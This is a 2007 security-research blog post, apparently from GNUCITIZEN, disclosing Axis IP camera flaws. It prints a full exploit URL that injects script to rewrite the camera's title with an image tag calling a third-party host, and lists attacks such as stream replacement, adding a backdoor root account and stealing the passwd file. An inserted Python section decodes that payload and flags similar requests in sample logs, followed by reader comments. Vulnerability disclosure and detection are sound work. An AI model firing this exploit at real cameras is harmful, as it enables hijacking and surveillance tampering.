Owning Big Brother - Hollywood-style Exploits Included!

Fri, 28 Sep 2007 18:43:14 GMT

I've done some research on Axis IP cameras, which I am now able to disclose and reveal some of the magic behind. Although this is not independent research, I am mentioning it here as it may interest some.

The research is made up of two components: a purple paper (one of the traditions we follow in GNUCITIZEN) and a video. I promise you that I won't bore you with PoCs, but with actual Hollywood-style exploits. This includes the classic attack in which the legitimate video stream gets replaced by another stream that keeps looping forever (remember Speed?). We even created a demo video of this attack! Blame Major Malfunction (soon to be featured) for this, as he suggested the third-party-video infinite loop technique.

Here are some of the juicy bits, mentioned in the paper:

  • Cross-browser XSS phishing
  • Replacing the legitimate video stream with our own
  • Adding a Backdoor Root Account
  • Stealing the 'passwd' File

Here is an example of an exploit that we've come up with. In short, it is a single URL that injects a script tag whose src points back at the camera's own ServerManager.srv with servermanager_do=set_variables, so whoever opens it makes the request that enables a custom title and sets that title to an img tag pointing at a third-party host. You don't know why that matters? Well, read the paper for more details:

http://target/%3cscript%20src=%22/this_server/ServerManager.srv%3fconf_Layout_TitleEnabled=yes&Layout_TitleEnabled=on&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3cimg%20src=http://snipu.com/f1%3e%3c!--
&servermanager_do=set_variables%22%3e%3c/script%3e%3c!--
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
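The following is an added example, not code from the paper or from the GNUCITIZEN post. It percent-decodes the exploit URL printed above, pulls out the src of the injected script tag, and lists the ServerManager.srv variables that request sets, so you can read the payload without reconstructing it by hand. It then runs the same check over three constructed access-log lines. The log lines and their common-log-format layout are assumptions for the demonstration; an Axis camera's own log format is not described in the post.

```python
# Added example (not from the GNUCITIZEN paper or post): decode the Axis
# ServerManager.srv exploit URL and list the variables the injected
# <script src="..."> request would set, then flag similar requests in logs.
import re
from urllib.parse import unquote, urlsplit

# The payload as printed in the post, joined across its wrapped lines.
# The trailing run of 'A's is kept at its printed length; the post does not
# say what the filler is for.
EXPLOIT_URL = (
    "http://target/%3cscript%20src=%22/this_server/ServerManager.srv"
    "%3fconf_Layout_TitleEnabled=yes&Layout_TitleEnabled=on"
    "&conf_Layout_OwnTitleEnabled=yes"
    "&conf_Layout_OwnTitle=%3cimg%20src=http://snipu.com/f1%3e%3c!--"
    "&servermanager_do=set_variables%22%3e%3c/script%3e%3c!--"
    + "A" * 153
)

SCRIPT_SRC_RE = re.compile(r'<script\s+src="([^"]*)"', re.IGNORECASE)
TAG_RE = re.compile(r"<[a-z!/]", re.IGNORECASE)  # start of any HTML tag or comment
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) ')    # request target in a CLF log line


def decoded_path(url):
    """Percent-decode the request path, i.e. what the camera reflects into the page."""
    return unquote(urlsplit(url).path)


def injected_script_src(url):
    """Return the src attribute of the <script> tag carried in the path, or None."""
    m = SCRIPT_SRC_RE.search(decoded_path(url))
    return m.group(1) if m else None


def parse_query(query):
    """Split a query string into a dict, keeping values that contain '<' or '='
    exactly as the camera would receive them (hand-rolled on purpose)."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def config_changes(url):
    """Map the injected ServerManager.srv request to the variables it sets."""
    src = injected_script_src(url)
    if src is None:
        return {}
    path, _, query = src.partition("?")
    if not path.endswith("ServerManager.srv"):
        return {}
    return parse_query(query)


def html_in_config(changes):
    """conf_* values that contain an HTML tag: the part that persists on the camera."""
    return {k: v for k, v in changes.items()
            if k.startswith("conf_") and TAG_RE.search(v)}


# Constructed log lines (assumed common log format). The second one carries
# the payload; the third sets a harmless title through the same endpoint.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Sep/2007:18:43:14 +0000] "GET /view/index.shtml HTTP/1.1" 200 2048',
    '10.0.0.7 - - [28/Sep/2007:18:44:02 +0000] "GET '
    + EXPLOIT_URL[len("http://target"):] + ' HTTP/1.1" 404 512',
    '10.0.0.5 - - [28/Sep/2007:18:45:10 +0000] "GET /this_server/ServerManager.srv'
    '?conf_Layout_OwnTitle=Lobby&servermanager_do=set_variables HTTP/1.1" 200 64',
]


def suspicious_requests(lines):
    """Request targets whose decoded path contains a tag, or whose query stores
    HTML into a conf_ variable. Returns the raw (still encoded) targets."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        path, _, query = unquote(target).partition("?")
        if TAG_RE.search(path) or html_in_config(parse_query(query)):
            hits.append(target)
    return hits


if __name__ == "__main__":
    for k, v in config_changes(EXPLOIT_URL).items():
        print(f"{k} = {v!r}")
    print("flagged:", suspicious_requests(SAMPLE_LOG))
```

Decoding is done with a hand-written query splitter rather than urllib's parse_qs so that the img tag and the trailing HTML comment opener inside conf_Layout_OwnTitle survive untouched; the detection rule flags either a tag in the path (the reflected part) or a tag inside a conf_ value (the part that gets stored on the camera), which is why the benign "Lobby" title in the third line is not reported.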
Fred:
Wow, so in your previous article you recommend "do not open any PDFs locally or remotely", and now you release a PDF showing "wonderful" exploits... I'm not going to fall for that!
pdp:
Fred, this post is from AP...
Adrian Pastor:
He he! The PDF hack is pdp's work, so don't blame me!! Hilarious post nevertheless.
hackathology:
Nice article with great examples.
Adrian Pastor:
A few people have been asking me if the video stream could be hijacked without tricking the admin into visiting a third-party site. I made a new video where the victim admin is NOT required to visit a third-party site but rather checks the camera's logs page:
pdp:
Impressive work, again :)